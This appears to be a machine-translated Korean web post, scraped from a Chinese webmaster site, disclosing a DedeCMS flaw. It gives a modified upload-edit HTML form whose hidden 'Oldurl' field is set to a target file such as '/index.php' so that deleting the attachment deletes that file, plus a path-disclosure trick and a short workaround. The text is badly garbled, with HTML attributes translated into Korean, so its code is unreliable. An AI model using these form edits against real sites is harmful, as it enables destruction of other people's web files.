중간 트랜잭션 http://www.aliyun.com/zixun/aggregation/6858.html "> seo 진단 Taobao 게스트 클라우드 호스트 기술 홀
Dedecms 최신 취약점, 모든 파일을 삭제할 수 있습니다. Dede 5 월에 최신 패치를 발표 했다. 하지만이 패치는 작동 하지 않습니다. 이제 몇 가지 버그를 릴리스 합니다.
1. 웹사이트에 있는 모든 파일을 삭제 합니다.
2. 경로에 표시
1. 모든 파일을 삭제 합니다.
일반 사용자 등록... 확인을 첨부 파일을 업로드 하는 장소를 찾을 수 주시기 바랍니다.
코드의 일부:
< form 클래스 = "mTB10 mL10 mR10" 이름 Form1 = "액션 =" http://website address/member/uploads_edit.php "방법 =" 게시 "enctype =" Multipart/폼-데이터 ">
< 입력 유형 = "숨겨진된" 이름 = "원조" 값 = "/ >"
< 입력 유형 = "숨겨진된" 이름 = "mediatype" 값 = "1" / >
< 입력 유형 = "숨겨진된" 이름 = "Oldurl" 값 = "파일 삭제" / ><!-예: 값 = "/ index.php" >
< 입력 유형 = "숨겨진된" 이름 = "Dopost" 값 = "저장" / >
< 테이블 cellspacing = "1" 클래스 "제출" = >
수정이 완료 된 후. HTML 페이지. 직접 포인트 제출을 엽니다.
다음 사용자 관리자 첨부 파일에서 삭제를 클릭 합니다.
2. 폭발 경로입니다.
그것은 또한 원래 HTML 코드를 사용합니다.
< TD 정렬 '오른쪽' valign = '톱' = > 교체 액세서리: < 신안 >
< td >< 입력된 이름 = "Addonfile" 유형 = "파일" id = "Addonfile" 스타일 = "너비: 300px" / >< 신안 >
삭제 유형 "파일" =. 제출 저장 다음 오픈. 직접 포인트.
경로 분리할 수 있습니다.
임시 해결 방법: 사용자 등록 금지. 사용자가 첨부 파일을 보내지 못하도록 금지 또는
역을 수집 | 웹 마 스 터 정보 교환 그룹 84087572 환영 교환에 서 모두.
시작: 폴 리 역 | 웹 마 스 터 정보 http://www.cnjz8.com 복제 하는 경우는 소스를 유지 하십시오.